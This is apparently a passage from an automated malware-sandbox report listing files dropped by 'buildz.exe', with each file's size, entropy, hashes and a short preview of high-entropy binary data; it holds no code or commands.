                        Preview:<?xml....k..j..a.D...B.....#QD|...++3Z*O.+..n......aU\(.3..C#....W..'..[..S.|.> &.M...I..-2..4....^D.^.2.nhA..K........|.......[#.c.er.i..@`.10.R.bC..z.KN*."..M....}...bF...IeH.o...).a>R..(....Z.0V.x.P.......e..y=M~....4(#)')WM..2....z...(B.`7F!....Q.."....J)..3.BI.k(W}.....Z.....@.P.F!....J.KD.+.#.Fk.9M].hYI`.....&ma....O.Q.2......Q.@..C...2..d..d..-6....c_;.A.:.t{...L.S...,...[.....H.D...S$...k.p.F.]0...H.-.\..:..'.U.............;...K.Y..G/I.4...L..K.zF.n....j.hB..B9.So&.Kh.?.Qg.^z.+..;'c......f......8.......Q..o.w.J:...s=.o.!g.....>..O E..u.....q../-.u.CK....f..K~e.x'L....%....C.....}.b...B...v?....*E;q7f.........S..w.^9...^.^..T..F...I.pT.....EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1699
                        Entropy (8bit):7.869458687540594
                        Encrypted:false
                        SSDEEP:48:o05DrjIt52+V7E/5mmfxQPxaKUzLfg20WfUD:oC3+aA0KM0WfA
                        MD5:45AF2E1605DA717A19EC3B8B1E14C070
                        SHA1:225A23B069D80C9D7F752D4B0A2DE32E3C6C9448
                        SHA-256:A366DE31D9992C8829C1103A869DC2D92A5F6115861436DA347BA6775C9B1F64
                        SHA-512:224A22D71B975044FD2BA8DC2C707CBC91E09DF5D4AFAB6AD5110F6CC6C390D577F41282FD0C2B0F04DBB8283B84078156A9D6BF6A4BF296A694D03ED079BD2D
                        Malicious:false
                        Preview:<?xml%.e.x@..q..@.G."... <.!.l..vh.xt...g..C1.<.p*v...O\"*.....@...j...nKQ...\.....$7.z.P_..7%4...+.......R..\.8.jgX.k.B..S....S.yQ.kf=.B......k;(.........?i0.......ud..V....._....f1..q.T!M..}......yw...+....8...CXM.N[...W$..4..$..=."...kr..M-..0..\;..^..5.y[.[M?.^.8\iWr.A.+..L61..q*.X}..........`.{u...q.A..Q}.-...^.>.........Fwz..D.[..}.......*...KPk...=.....G..a..M.V...L.K......0...O......w.VB.j...lBb..E...S$..@...J).,...N.y.....$..HbN....l..]..O..4.q..B}*..J...n.i......P.l4jQ1E.........+}...)G-...+.DO..W..Q.C..~..*..C.=... .i.1.&.yB#......&...T..<r^.... z.]..cp.z\.........(3.t...Fb..q..g....#8.bN......K.6v..x.u...1....zhZ...bi.....Nc.l.......r..+0:......'..$l.(..'.^,&...L.......C....B...Yc.sg...I..ezI..^...7g....'...RH.~yr...5...6.\..........U%i.:v..x.".oL.4.=.#."W..x}.."......p.a.....@..)}.l..-..Wc..#8.=.;..u4#.............%...S\b.}Fw...-..!....4.7.Z..w........t.a)./(:F.......L1d"..e...{s9%.....,.B.I.....E..&..gX......n..(.......L)..?P.0{
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1736
                        Entropy (8bit):7.885508137044968
                        Encrypted:false
                        SSDEEP:48:HKCkyA2i6KEhHC+2mQltEid69QtRs2MpUD:qxyA1IhifmQlGidDiFpA
                        MD5:8AA577E0B954FFAAAF2EC86F80C2CC02
                        SHA1:09F59B496760346445FAE6B5876B212116466475
                        SHA-256:A08517D06DE95B193662CEE9421DF2638B23226B044A2DBE5DE61E962527B440
                        SHA-512:B748BB826A5FFA2B25842AADF4CCC20C0489933AE0F7875A72B60096A1ADF6EDB1DC269978BA78258CDA1CA6169AF98862D5C6BB05477A0F60619E7F75E741B1
                        Malicious:false
                        Preview:<?xmlB .<?...r..`..,...\...b....P5......\.t. .."m...f3.m|<..p.U.U.. tF.)F.?.o...N8.X..|...A-i..VVN.|Q.q........"8On.. ..b:?MD...?.yz...N...Xauy..-^..eb.K...1..G.v....6.5.=..86...|<w92...~I..C..kA....,...^~m&.=]J..b...W?Rqt....C.......v.u...Z. ..."......).(D.A...q.{=.y...X!.].r.+i..'..j].$.W..vdt....+gx-......\}/.l.........S}..5..b...w...........(.:...W......2?.&.Q.6K*.}.vuIA.~>.x.....P>.8C.......x.-5.;...l).9..5...VOH....... ...C.`7...~....9~#.. ...".../g..n....f.F..\...jE..m....O0..9.....u...'.... ..o......'.......k].L.0..(h+.k......;.,.]n.v.*m..1K..S\......l.....U....^"..J..3#>..=......EQ..........Q,.....x)..)...FtZ...@pXR:..].T.eW.Y^..&bX.....T..)..qL.. ....3x.:.......l!D......qt.`E.OH..x...p+.i.......-..h.zp.."....Y.../. z*y..>../..#*...x...cB....V..q..T.U.t..<OB.._.x..N.~....pFZ.:.*.>.|..=...B.6.&&ooIW.h.B.....eN.9M1...}..^.VF>.].:..`.O...$..s...4.(.Q.>...u.vo...KC..c..`.r.........W.s.2.'....+L/YM5h..a..Z.......Bj.xi"...%.o-~.M
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1689
                        Entropy (8bit):7.883465300363512
                        Encrypted:false
                        SSDEEP:48:YPIVsmDfKa6kiKPJp50rQyh/4KpvLfFGANXuvic9qMYM0XmUD:amsyya6kiwHCfJ8Jic9q1/mA
                        MD5:01BF360B77546958F3E684DABD540163
                        SHA1:B6ACC0048F5526E95365F38AEA9D8C30AEB67ADE
                        SHA-256:8C23CCEFD49876ACF0FB4562C0E9B186071D3CB090017BFD60EB6EA23EF8D1E7
                        SHA-512:84733DAF41029D31B03332BA623B47EB0E33DC77F36160E2135855308E8DCCEFD9CE8C42FD39AB3BDA25B3D648FC0B4715293CEA93C09F41D8A28B146D9A163B
                        Malicious:false
                        Preview:<?xml0..>=...S.k...-*./;=...q..v......T...tPZ....WR...o.#R1...j.....0....&.aO..)....oq.Nj.....Ge.p..7..*..1..c{..*yU.x.].r.R.O....f.R%.,.#..n.......).|....A.......n..E..s2.y.a?..~<&. ...l...@..F=..V...8].Z.p:?Nm....F....-.j.Us.}...1.{.....D..9]S......=#....k}9..EM.z..X.2KL..............m.....T.*Vj.....E.e.p..........................nG...F.\....o..B._.E7}_.p..'..h.Y6.b..2.~!;.O...h........n...w1t.4K...{.r..0Q...R0$.....f.*._5.u...........9t.K...qg.")...H*..15A..r......U...A1....///Z8..-Nm...x......a.c^.7......^.[w....e.B..V..5.Rn..>.W...j.=....B~B.d:... ....i..i=....K.......|f.....f..%.u-.{=.,-.n...s.........V?.N[b.f.;...{N....,E.........G'I..K.`..t.p.R.[.!.P.2......q4b.mc.......*....5@3.....K...e.=....#[....vm.,...tS....r....EN.v(h.....tl~....Q:.s$n..S....UR)D.HK.G.@..m.w./.|....,.e.w.[.}.QC.......Y.0..n....L....8...........^..Wa.m...L.$.?S.3.:Mj.S......o.>IT..R...&...-..G.X1...B......Td*`..D.y8V..2W...6.....9.......51..)hNY.i@..0......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1726
                        Entropy (8bit):7.879148574995852
                        Encrypted:false
                        SSDEEP:48:R7AiXFqc1/Mtqp6T0FKeutKFofutfTv2wUcfA0zYcUD:R7Ai1qMLMT0TOKFrytPO7A
                        MD5:D7C90E8E160FA727667A3006BEC76603
                        SHA1:BF1C5B8FB43C11465AB25648933A94CAD4D3C246
                        SHA-256:5739EC1F648887543B5FB7D7A5C1FFBF2B85DF0B11390A3043118BBD0FA785FF
                        SHA-512:FA9E96C412586BC8A2CBEBF79BE475913A996337A2010EAF5B31CDDA10E1C5DD302C5FA3680DE753F443992C9EBDB418194266F33BF3F2252BDEFD09310782DD
                        Malicious:false
                        Preview:<?xmlo.$D..].e.=..M...e6z..`P....{.7..h.....8]....|..oKb...tdx|.>..'........G.Aj...<L....`.n,F...Z..8...{\.g.2-....j....O.D..Yd:..!.I.=B`....k..&...0hK.,..b(u.....J8i3V..Z. .8NzY..JR..R.N[]......C.n.5.'...7..G.+..0.....k......l.DE..S..<C6.'....r>..!v. .....D_...T.[..+... ..E..L.X.#..._9!g..!.Kt.f..3...tp]..]..,...s....b1.9wC..f..eS.v...c.:"./].4... ...a(......]...fe....I...y..nKx....%..B [...'8..ogc?.YV..l>....5 .g..T.....s..3..'......c..W..0..x....q..v...(...I.7x...24..$}*.S..Y...j..?0..{_n.#.........f..v....u.O...E.g(.R.Y1.6Rh..3J..Q.5Ci...&...}&....[.E....8m}UI..^..$B..xf.er.%....1.....HJ-.w....d...j.O.N.Ai;"..s.p;rj7.y'...A.....o(x..k4...N.(.YT.s.......I.w..l.M7....y.$...3c$....t$.G24.._...b.B....yA..k.....{......sy..dx.Ik."c....".s.^......K.o.z.X.....k&A.O.......l......l..9=.GU....ma......6..H.)....%.:."..E[R|.Po.....;...p.?th.P.....K0.....s.1.Ua=BFcHg5.g\...Ld.l.\..Dh.........;.......0...|..0P.{......%W..cr.p`vm........p...I..W.zz.=..3:8e..Ta.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1701
                        Entropy (8bit):7.8691258787849465
                        Encrypted:false
                        SSDEEP:48:aGI6iTnqJBV4QEwgv+r0iA9MQj6ce+aOkHxotjSw1xuBdmUD:avOvEfW5Quce+8xTWA
                        MD5:10929E1ED730F71FDCF503C4A2511FC4
                        SHA1:4F36AA43EDA01F255163C5FC15401EA362E8D3B0
                        SHA-256:35375EDEB3C0A789BF4C569E1CAF5E259A650C681318FA63AE8EF3DBF947C5F8
                        SHA-512:427FE250AAFFFEAA2BD9850698EE4352363BE3274AC917D77426DDA0848E7E3E418850E5CD7E8CE536C2E1F50CB5206C46CCB61D7ADDDEB3AC658013571C283A
                        Malicious:false
                        Preview:<?xml.....;U.|... .!.Tu.k.RK....+......q.d.V..>.T5...A....B..!...2.G5F,C.e...#Z<H..c...W.%..*..M.~.....[q.F.."...C^o...j..L....v..k....O.....*..LE.....A5.."9.3:..k....^..Ju.^...2....)...u..:..vA.(*....=c./p.O.....N.?...g.U..V.:...;$.9@..1..;..L.3*..*P?...k.[.C^Fp.{..!.`2.....l...Y../..6]...k.e.6z....a...j.....bI..z......N.?..d.....}.E...8..8_lXh..K.2.\.&.Q........:.w.'..0.[.u&:..(.fl...Ly|.i.X.......j.QJK`a9a...|e. .l...}..9:...Om....i.4m.....#T..'...[X|..9.7..N....M..1#...Y..<..}.Y....V]...r.8...&...'..Un....+...../.~;.z..&.R.kh.........4J.h...t......./.'(...[ED=..-..&.5p.I+;.4Q..[.......BP..7...X#P..E...~.o....n/.x4i[.i...E...X.{.57.s..)...!..|..Dv.......xCnri..p...}........*.....SZL.#.1A....Rw|.N.7Ji...Tw.>4Ie..[..!3,K}.....'.t...A`...>DHw..7..3..#..$2.....{....K. ....6,/..8C...W.s.8.aI.5..dt?Lx`.([w...$`...BY..W.x.~..(.|).CG...@.x^.....S...{.."..T.....9......67=AX=.......z...}.(M8..H%.(\...]!c....'.a....s..i .E"O]...D.Z....k.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1738
                        Entropy (8bit):7.88184974154561
                        Encrypted:false
                        SSDEEP:24:7+yJOAiKYSVe9Ug3MHiTKowIYfvchgAA+iGS5MDKbkWmvqBGDHT8M8HGbD:B/HVe9U6MHiTPYxl+1WbBYqUcjUD
                        MD5:1D84AE1B227A037E97DA8CFAF8554092
                        SHA1:731C6FD617B173F0EAC1925151DE85441EB84A14
                        SHA-256:8637243FF2ADBD2C48BBE89810570CE893370E083A1FA300F93F900BA01D16CD
                        SHA-512:911A1DF386411155D79AFA2484D6B8858C6F7B4DFD18F4BBD467C7EE6DBDE23E92E6BCAA0B1CBA1B3B2081B3EB38D9F2C76585AEEE41AFF9C6FAECA6BD5E5762
                        Malicious:false
                        Preview:<?xml.U.i.;..o......TRa...|y.....sW...".1.......>.z5....`{....h.......)...\.h..L:y.hL......D....7....R83..,1......#.Oo#7.KH.~`.....e.:..[.YI..,..{..\^ ....NP;.n=.f7..~.s.7?z).0..$.W.{.. ..'M.=.{..1.xE.)..U2.W0%eCW\.....F.1N.F..<..O6.-...8..[...4z,...C..$..aJ...2f...B....Gf...n7Y.G../....m..F8,}^..c..P.>xgq<aDF.[...e.y.....se/."..I.lu"g..ak......*..F/..{.W.=..9R1..|.$U.B.XB..m.x..#A..W...2...9...i.g.!......,$'e?.e.7.....g...n.,. R..n....,g28..b...)L.../.|.........3....lA..'v.........x!.v.L...o2.....w.|..ej.J.\..@..(:.. Nk.Xd..-......m.(p....N.,.....E&..[n,..R=./.Cy.}....f.3d.z..i....o3...x....p.......]7.(J+...... ....9.".k.NjE..[W...sX.....g..J....>...6....i.gn.:.p.`e.`#p+.......S?....jN....v.........B./O..,v......x.e.J..>.`.>....(..k5..]..@B.7..^_MbjD.1..a.!...<.T.K....J&..../<...t../....!........-....=....%y#.Q}..m..|c.!..}u.f[...<..^..<....D.......f..h..YD..........9..t..t.......'.....h..9.!QK.c....|...."M...|..f4N..c...@
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1689
                        Entropy (8bit):7.858616685838062
                        Encrypted:false
                        SSDEEP:48:xBlvrgo1AGWXOvKg/sVliO5l1kY6sHaNUD:xBlbivey3kO5bL6sHaNA
                        MD5:2D9CF9B4D665EB4EC37F37DD52E10A3D
                        SHA1:F54D992BC3444AE6F76DA707783687A3B86194A2
                        SHA-256:59594CE3BC5C2C694DBD868E01C2DEE9430442978497B926812071A936707381
                        SHA-512:7AE17DBC57170E1FCF87DB8F940E1BC69A1F71E0AAC12F65CE930ADA9101DCD44A2455C5592B9B619EEC6B81F8441B4E4DCA27BFDD64DB422654260A1C6CE96E
                        Malicious:false
                        Preview:<?xmlU......F......BO.Q.b....;5....b.y1.prc.B...........t..t....E.P...GF.I..,.S..j"..K.. p.U..:..sw.....<.(.h)U.!..@S ].5.Ao....Y\..!..Y.1..4.N]......z...A...p.^l......j]e..g.b..sE....#W....E....V.u..&..K..k$.m.......Hc.R.....&3..m.]'...\8S.....-..6.....I-.g.Q..3V..........E"..~[.>1.l%...KL.L..O9.K+HvE.g.".`k.P...Va.bT.<...}$?xW..#......B@...gYb%xjU.b...>d.6\#HK....8.>.ss.lKO..=.0...R....W..;!..(..Z#...B.?R..b....<..].!.:.9...ke...^j.....S./..m..G.L.]..z..I.y..)....?.$.O.F~.T.6....xY.V......&..x...S..&u.|..-.nQ&i..5.....?`...-.2..n./.lX..........._...9.o.7f.......{.Ot..].c.[i..[.V.?t.l.$Z]E.:..F.+.../..l.B...x..p....0.....&...H..=.4caA..bE......e;A......c..........nJ...LC..h.....'...iP...{%`..k<w...4.....Y....!.-;.".tD.R.+...G.a.......3KR.P<Q.DZ.c..8.X.+.>.W..*.).Z..h.%.H..xJ...B...Gd^K...~..\../.V...BR.}..E..t.52.Sld..WD..WB4.#..R`.b..a.de.}...`....dU...#u..nG.A$=..]..Wm^....O..*e..G..,....k..?.<u.EQq..J..ao...)..4a...9.DZ..L.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1726
                        Entropy (8bit):7.881486260042397
                        Encrypted:false
                        SSDEEP:48:7kCwU/N69/uUwcQeuCQYdSMfZfwKFnnUD:Y3oI9/u0uCQm/nnA
                        MD5:10E82292076D8CA173068BB8FD895B0F
                        SHA1:EA5EA06E43FA13F86FB993C9E32DFD34E47A6888
                        SHA-256:3E4BC669C41B2A8D0EE3F6CA9D8BFCBB54E5F70CF8EB1145074191A484005110
                        SHA-512:874A8A8D1E968B85731BBF85A23DAA0A5BFECEA179B9D3919D8BD9A77B493A403E69555E8E924443E945A92980B8CCCE98AD7A8AB1400E4B23EC952F53F10CF6
                        Malicious:false
                        Preview:<?xml.7....?..{...v..i..!.....,...6b...3=l..K..h.....d..bl...?...w2...d.@......O..P...$ .~..5...F..v^..E...)..<8......s:c.7{...W....p.L.9>.?...jK.d8z....._..(!..ro...4...%.I...0`..1...TD..N........:9.....R.GI..`Te....5.$\.9.ET.NT......Z..].W..Z7....<._|..~..5.E...<S....:.. ....~a..2Lx...l..R.h...`).......Ff61..../g:Hi...P..(..C@.\...h9...c.......l.M..s.F.a]..St.....R....cwT..B..U..&vj..&h..?.1...x.....E...q.OF...%J....c.<.#\....i..U......._.Et..'.v.9m..(.'!..k......B....2..c...dWv. ..P?....,B..;..P...'},....t:..B.i..+r.q...M....Gp.....).._.#.w.|'.. ...>.v.w<.&.....p.b..tB...l<M\5..d/A..r...........t...d...%.i..M..S..7........s.j.d..x.......+5c)..gQ7...!u......Z...........f.+.<.\... .....fg...<h.._...!..Ii..O...(g/.U..G..54.2(..Q..x.!_6.....o.k..u......'./..z.......~.=.G..^..)...Q.#Do..7C._.X....../....f....c-x.E*.75../...*.n.../.5.5]u..G3.<Y..(....^~*m.=..........)_..w.L.*..U..<...4.s...oRL^..g..-.g.H2../_..`.,..@.%....y.2!6....t>T!.R.....iB..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1697
                        Entropy (8bit):7.88275633630441
                        Encrypted:false
                        SSDEEP:24:pk7+5AGpdSBhGdpluHc7tROwsDZZ6GVffbPIVsKlllSK3xGpJH2JGbD:pV5ASpl37tROwsF/VffbQSKQK8EJUD
                        MD5:B2C67387281CB960D1CB1A93D38F597A
                        SHA1:0B1E96BE481383CE3D9E5AF5C8A8CA4DFF5683A4
                        SHA-256:3C550D78FA3B09E088A485C5382C0291718F439E8889AE4DFF4A63CEDA70D6B9
                        SHA-512:D686082D3752AB656AFFA8ACAE821F02353456772F12CEFB9F44589450DD9B026F0C3C950A3C861477D2CD2EF56BD7122BB1D514A978B33362AA30CCBA63D6EE
                        Malicious:false
                        Preview:<?xmld$..l....>...E.h.....#iX..F....N.`.&...U.%A.....D.o1..S..X..z.17.n....Kx...c....{.^...E..E.K....g..rf..<i.V_.V....UF.%....;.k...(.......|._..C.?}X....+..".8..Z.v.c..K....<..R....|4Go....h..B....k....82.uFXl.g..X.K..P........@..T(..E..^..F.y.v.1{o...!Z....q.a.p<.!nQ.f1..2..o`..QPT].E.e........XaJ.a.-TdK.w#............_.?W[..$3....#"..m.w..O..Y.r...."...r...`.....,..R.~VF....G.Q..........5*..i$:!..##.......n!*...~3...HS.B0.tNF..m..I....S..;\..Z+.c..".1.M...#W~...........R.).V..:/.MY.GC......BMA..`..G......)P.~j..T%.(x.U.|.i5."?.M.W.r.Ox......9....A'.7D.?..Gc.......'..4......}......4...k..:.f.r...4VbrC..b=6D..i;....].2Q.}<.H...FF:..M..aO......^....X.t.?.1. .?..G1 C.L|.M\......:B3.3#.BW..1.T....1u(.l?X.P.*R4..U..........S#w.b5.s|. 3./.....M6...a]t*..[.9.0...(`.h...N.q..f.J0.:.....E..8'j&.....qH.Z..KNE9......1.........I.b.A./ww.O:":...}}o^/3.^....e..*..KS1*..K.{......O6.....%X.Y..)E..?3.7&.s.=}N..n0.]].....X.V.......b.W..$..fh.BT..W&R5..w
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1734
                        Entropy (8bit):7.888150605304327
                        Encrypted:false
                        SSDEEP:48:gNR6BvJmNZ0M17zKIrrJS7nUewJ9ThDd417LoYUD:gmBvMNGM17zK0rJSitQ1/1A
                        MD5:577B5A4986B0BF088476A634F6F92BE7
                        SHA1:2ABC3136DC5B7996618DDB829FB90A55CD258204
                        SHA-256:AECCC3E525C6BEFA9B09A7A2E22C456BC6DF2A1C05807211E9C881FAFC0C2504
                        SHA-512:D43FCB6E1160085944138D913099395984B5EFD0F83646DECC4596E60FBC6348B34E8EF60324BF10DD67E3382FA0A3DF209D7646743BD4F2C2FED5319DFEBFF9
                        Malicious:false
                        Preview:<?xml.....S..6./z1A..5o+..i9.o..Q..N....TsZ..Mq^e....Kd.{....T.6.14....?\;.q8...j..L...~...Xb...)...p.>.....i.n.].[..el.......U|.3..va/=.:.~.....G?....OT..........v.6+.......).cZ..T.>..n.........#.n.........#...j....-..a...Y....b....|....2..[*.......'W.$....d[iZn....`..dU..pe..A..!c.4..<../....kN.B.A..!P..._.&..ST.#..F...K/.C|.......>l.Q ...I.......f.c8.0a....._../.....{7"'R.Y.1.8 ...F....:qE.6g...j...j(.....D....#.,...)...i...w....X.I.?3:v....Y{M-.Q..A..#........B....\IwC...}...a.!;w.C.S.Y...]........g...^..)2......).%/j....<...E.'..R..-.......ndJ].F9...Vs0.+.z..\..+..1PKe....Tm..-.&*#.96.8.U.n....G6u.]Uub<3.UjH=.1..W-.l6....;.".3..a...a.....d....+T9DJJ.m..+....8C..%\))./....3.EvK..a..N...!.J2..^d.....v...|q[.jm....X:[. #..].)k.+a.q.D..8..Z.cx..<....@5.G..x..JE_........!.?...!b.Wf.l.........{y.h8.L...2.)....].....5....QYB..D.p*(...........3O......|....&...%n....l%C.2..J.oN.....g.@..v..@..$.6\S...^...7*....(.JzM~.oY...#..&.ig.....d....H
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):7.879485678886128
                        Encrypted:false
                        SSDEEP:48:8Mc8i2U24wiinkHRUWT26hTyq3eDgy9rg2dmbf4RN8mHq4d/cgLGgY2SDuyUD:8McbU4wigk6w26hTx3ek0rSKN8Mqq/cA
                        MD5:0D5E8F668CA1C55B0BDFC92A62EFC79D
                        SHA1:DC6F94BB389C9A1651FC41622883096AB4D7C019
                        SHA-256:A48751498AFD037E449D15D8D795875EEC6983A7CA4A35B25DA9C6D474680CA7
                        SHA-512:CC37906E3383FF67B5AAB628D7CC04752D70E123C72B127C2FA96915433CD3959DF5E9513CF07487ABB4994985B8696D255119AA6535B87A30E527D1E10432A2
                        Malicious:false
                        Preview:<?xml...T.j*..#6...4i.....r....W.\lL...ez.....Wx.+.d..FA...-.. ..ny..k....dj.K...w..dI..IS."qK..v..(.Z..zH.}...^..].I.....sp...rG.X.53.i_.......P<..=...%y.......o....D...0Y<d..+.3..ev...hWj...M..F..[..?..#.Zl...L.M.f{b.1.rj3.O....2.Z.2..q...........S.J..OT.F....Q.%...5...zz..MH.......#F...).A..sVz...0....@.....v..G.!..0..L.......oR....N.V..6...<.$AU..PgO.....|<..O....T...O..3....)D3(...;.).....k.NNGW.....e..%}...(_.!.q.......$..$......o.*.-..e.,A}*.ib..Y..d!Q......2......o}.oo...t.....g[...<S.[.?..|:Ja..r....Oq.:+.3.b..I8Y.d.....:.f*.~w).`.=.....[...~).V....U..v.H.x...t...v.D...o.U..H.E0.;.L.,.s..).......".e.f..QZ..g......E.\.k.o.(.'[..R.5..Z4.?.&..g.O..V..y.mc.;....&j...b...d...M...z7.<.E.|......5..t.'^P...8A..3.%....X...........e..5J...E.Z_ U.j.........kE1Z...I$.....#2m.6.w..>.._;..../.....N+.;....s.u6.*.$P...-.T.FeF.....D'....}yf.K.0..B....j.%......a......r...b_~...x..|..+5......u.....1..{..lq....._".g...\-.{.L^pL_/.....p.q#t......L..Y.^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.87067891035986
                        Encrypted:false
                        SSDEEP:48:ajipAtXanlSXYyF7wNeoBw3l4PCV8auLy+UuUD:WqlSowENZGWAey+lA
                        MD5:2B930279276CAB9DECACDB4597C58232
                        SHA1:3E823AA3C197E866AEA5EBA55972C40ADD5D10AB
                        SHA-256:C4E0E92E7ADA30AC5718DADFBCF1B6482B5D5583EAFA72C5695DCDEF11014CD2
                        SHA-512:22B6CD3EDA49D640E0112116F3C8801A1971BB3037B2FFE92111358C83A7509179004D3C095DE7A0BA6205E19ECF5C604E25856E25BAE3555761508ED8635E93
                        Malicious:false
                        Preview:<?xml..F.E..1-..i.M..M.F..zI2...|."....\3.+.H.N.vL..E..(..}..2..,9..p....9....P@A06....1........;.;qI. ....=.A6...r..M.....B...GhQ.O.j....2=.X./>Z?.>v..x...K...M..].k0Q..H...m......j.L..j..L..E.Z7...H.@..%M.I,)E.t......F..S...2.T...TP..-x..r.d.K..>.*.GV..?T.m.,d......!`*.7...Y...KV..o..~J.......z.....q.0.,.X.^.I~...}]K.'...EZ....p.'...Ff(.?...J1..lH/N.IE.U....4m..)....W.a....X&bB=.]..z..Cr......../E.oli$.4. >?....$?&9.a..Q.T.....j....K....:..e..P..&D.....I..s.S?%.}W.#A.....8....K.......x....@.6.v.V...m*...'>>AZ....j.....{..9.Qf..~..I..!l.@...S.E.JS...S5..EdK"ZBt.A...W.....z...W}^5.P.#E.....Eb...rnN..q.C.+9..r.^&1..(4...{........I.)f.\5.Sw.I<H.R......8N.Gf..N.n....>.3.N.=..I.E*'.WC.u.<..Qk....g.5.G..f..}.**2~.....&y`....g]..2...B.6m.;.Ii...r;.....,x.=.d.HDp..A....[....wg`R#....j. .zb...:...-.#.4.."....\.../ .Q..f..;^......K9&v..).3...-.."....Y4:'r >..... 8M.%52.;......9.sg.z.A....o..7...l.........t..-\....Yi.....n..t.g......-...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1697
                        Entropy (8bit):7.89958493647332
                        Encrypted:false
                        SSDEEP:48:+MLBiVuDr9vB3IJ6SzJsIXsbuC5MfacwBA7UD:dVi0DrhXS9BX+Z5fi7A
                        MD5:B37C079B73EEE23F1A196B8847989E49
                        SHA1:C4EC17E04851DA58D0ACC03966A18FB5CC74FDC7
                        SHA-256:4279BE0AF88EDF827DE2C435A38F37A1A3D5AB73E5E44E73338CA69C09F5C146
                        SHA-512:8E80CE19E71646BCD1EB3B19A9D97037A4909E76E155CAA65FDB731745BA1043EAFF3043C5E8B8B398F315C9EACC0D4F3439B3B460BBC9655361EC7E21430BDA
                        Malicious:false
                        Preview:<?xml"...)......c...u...B`m.l.DM....b.H...Y.4<.F...M....a.....Pn..U.T]Z.:...C;-...#;"\.d..+....D.....s......G.t...;{...^..H.J ....'.44-.....#?.w.....q..W.1.......T..5,?..T[.7...._.......%..{Wi.........e....gg.c...........3.....^.%.C.U....,..K..8U.m./S...1T.w...@NI(.-.Qk..l..~.BH:..Ac......W.....y-8F....rd.........T1.!....=E.0m0..Qd..\....$.r.Z~...vI..O4...E..o.....4......r.%..;...._..#...V...s.8..|.J...@.d....#..8..S.(./P...x...^.?.'s#I.....6....t.......l=...h..O...a........j6..>.A..}8..........T<H*'_.a...f.R.ahG}.....$.lGX..W.hnF........A.R.:k.H...7D#.....A~.t..........W.....k..!..z.H...!....s...*.>0+68...W.%...d..Z....&.BK#.9`2:.U.......yZ...TK.=..P...v(@X9.|`..%.G.]"}.P...Ix2...9..)....`.. .Z.6E.....B!:...C.se.\.}.j...v..P.E..ko_.`..\....gJN...........f7.e...uYTt..S{It..]..K..K7.....-...EI.rp...a.:H..r....@..9'.....u.K.........."..!).L{.Y>.F..G...r2.+[R.&..P..}n.v.P/..DRk..{..G.O.cw..+.^.!.QSU.;.=f..P..?.......3...PG.9.q..R2
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1734
                        Entropy (8bit):7.87560060646136
                        Encrypted:false
                        SSDEEP:24:BTMfLADkp6uhIXKVXPIuPvFaEwk7FahjKcFHeNK+2SWx5KFelhyDIPLd7Xl3pGbD:GFjy6FZs87Fad7HeIRSW7m0hyDcdzjUD
                        MD5:8F7ECF45EE47FCF2EE7A6E72B991AC13
                        SHA1:F45D695554BB3A9B0573B142789B1E0D8103EBF0
                        SHA-256:4B49F3E33DB1D7DA31A2F3DF5EF7C005F4D7AC83665B05D2E2E7B232DDFFB7D6
                        SHA-512:BCE735D37D926E419BF039202B3F733F558B2D5C6D71283E0F5C5595230676A92FD2055579AC13015D626394387255F46D3E15F55F6E181C432F03E7D5270034
                        Malicious:false
                        Preview:<?xmlCA..Q.s2...9..l".#..TL...]X#...[.>.......X...@.I...D..N.<&N...f..\H...!.#5p..)...4<..)n.p[..<.m..0."./.._.".....}u....+?......x9......b.K.Y!>}B.$...M%. ..fB>Td%.!N.R...c.U..m.....d...b.2..\.o..K2af..[.GZ.&.9.bgq.....xu.^.T9a/........5.|.....B....8..w/D.?6...[..Hua.c.p.d...J..%D..o.t.zq....t|.<.X.......4xhL..18....g0....feA$=..9..... 3`.nQ.x...Y......IV.OE-..H..3-./Xv.2...u.=.i.T..".z....4.f/..._.i..,5'......T...../..iz..t.~..q.V.....\........0...9h.p...(.L.`j..#......_.PS..e.)gU....-.J..W.t.u.?==?..|!j.V pV?.3.....xPZ.e...(.P....E5.T..j.W..l.JV.[......Q~.Rm...6.......RQk.~x..C..'yI.....`...,.M..q..M.r3Z.<.......M.g..v...9..!...O.^..=.^<`.<r@p.bQ..!. ..`.\=...}n...s..d.j............>'......*'^.D.l@)('YvL..K...p1"...e...sUx7.i.~..k...T!?0...&.q.....b...j...a..t.....D.5....oD`}...B[x..4.f.A+..TN...U..Ae.Y).?{......G..u.*.&...K.....O..H..pXRMv...P.............?4..h#..+....... ...."....]|TT..!.B2Z...2..71].?...4..L.E7)....M..|..8G....v..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1710
                        Entropy (8bit):7.8812606729304715
                        Encrypted:false
                        SSDEEP:48:/s0pquyPrYmLfTl4zkrCfvFUUIe6A6DwnimMl81UD:/s0GkmzTuQ2fvFDmi1A
                        MD5:B5FE451035BEB750E76C15EF284A7B30
                        SHA1:59539808DA7F6CC9545173EB1777CA7318EF3F57
                        SHA-256:AA09377148E129D6222A4782A9F2FB5E6CAB1C4D84B5588D667841D99BEEF45C
